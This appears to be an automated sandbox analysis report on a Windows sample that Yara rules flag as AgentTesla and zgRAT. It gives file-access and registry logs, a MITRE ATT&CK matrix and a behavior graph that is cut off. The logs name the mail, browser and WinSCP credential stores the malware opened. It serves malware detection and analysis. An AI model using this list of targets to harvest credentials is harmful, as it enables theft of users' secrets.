                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Users\user\Desktop\TTRef06022301.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected zgRAT
                  Source: Yara matchFile source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPE
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TTRef06022301.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: iJyzakGsXF.exe PID: 3696, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: Yara matchFile source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TTRef06022301.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: iJyzakGsXF.exe PID: 3696, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected zgRAT
                  Source: Yara matchFile source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPE
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TTRef06022301.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: iJyzakGsXF.exe PID: 3696, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Scheduled Task/Job                  		Boot or Logon Initialization Scripts1
                  Scheduled Task/Job                  		2
                  Obfuscated Files or Information                  		1
                  Input Capture                  		114
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		Exfiltration Over Bluetooth11
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
                  Software Packing                  		1
                  Credentials in Registry                  		1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Masquerading                  		NTDS111
                  Security Software Discovery                  		Distributed Component Object Model1
                  Input Capture                  		Scheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingData Transfer Size Limits23
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common111
                  Process Injection                  		Cached Domain Credentials131
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  Remote System Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 803161 Sample: TTRef06022301.exe Startdate: 09/02/2023 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Sigma detected: Scheduled temp file as task from temp location 2->61 63 4 other signatures 2->63 7 TTRef06022301.exe 7 2->7         started        11 iJyzakGsXF.exe 5 2->11         started        process3 file4 37 C:\Users\user\AppData\...\iJyzakGsXF.exe, PE32 7->37 dropped 39 C:\Users\...\iJyzakGsXF.exe:Zone.Identifier, ASCII 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmp685E.tmp, XML 7->41 dropped 43 C:\Users\user\...\TTRef06022301.exe.log, ASCII 7->43 dropped 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->65 67 May check the online IP address of the machine 7->67 69 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->69 73 2 other signatures 7->73 13 